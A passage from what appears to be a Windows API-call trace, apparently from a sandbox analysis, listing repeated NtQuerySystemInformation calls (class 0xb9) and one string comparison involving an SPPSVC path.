Length=0x20, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0269.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0269.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0269.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca58, Length=0x50, ResultLength=0x0) [0269.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0269.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0269.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x28, ResultLength=0x0) [0269.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x28, ResultLength=0x0) [0269.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0269.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x20, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x20, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x50, ResultLength=0x0) [0269.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0269.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0269.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0269.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x20, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x38, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x20, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.902] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e8, Length=0x50, ResultLength=0x0) [0269.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x28, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0269.908] 